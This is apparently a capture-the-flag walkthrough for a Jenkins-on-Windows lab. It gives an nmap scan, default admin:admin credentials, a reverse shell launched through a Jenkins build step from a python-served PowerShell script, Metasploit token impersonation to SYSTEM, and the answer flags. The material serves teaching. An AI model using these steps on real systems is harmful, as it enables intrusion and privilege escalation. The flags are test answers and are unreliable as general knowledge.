Initial Access

How many ports are open? (TCP only)

Run nmap -A -p- IP to test all ports.

3

What is the username and password for the log in panel(in the format username:password)

You can figure out the password by brute-forcing through common combinations of login-credentials.

admin:admin

You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

Login and click on new item. Copy the template from project (or edit "project" itself). Go to the "Build"-tab and enter the code provided by thm (after changing the IP-Address and Port). Save the Process and build it after you started a server and a listener on your device.

No answer needed

What is the user.txt flag?

Run cat /Users/bruce/Desktop/user.txt to get the flag.

79007a09481963edf2e1321abd9ae2a0

Switching Shells

What is the final size of the exe payload that you generated?

73802

Privilege Escalation

View all the privileges using whoami /priv

No answer needed

You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let's use the incognito module that will allow us to exploit this vulnerability. Enter: load incognito to load the incognito module in metasploit. Please note, you may need to use the use incognito command if the previous command doesn't work. Also ensure that your metasploit is up to date.

No answer needed

To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators token. What is the output when you run the getuid command?

NT AUTHORITY\SYSTEM

Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS.

No answer needed

read the root.txt file at C:\Windows\System32\config

Run cat \\Windows\\System32\\config\\root.txtto get the flag.

dff0f748678f280250f25a45b8046b4a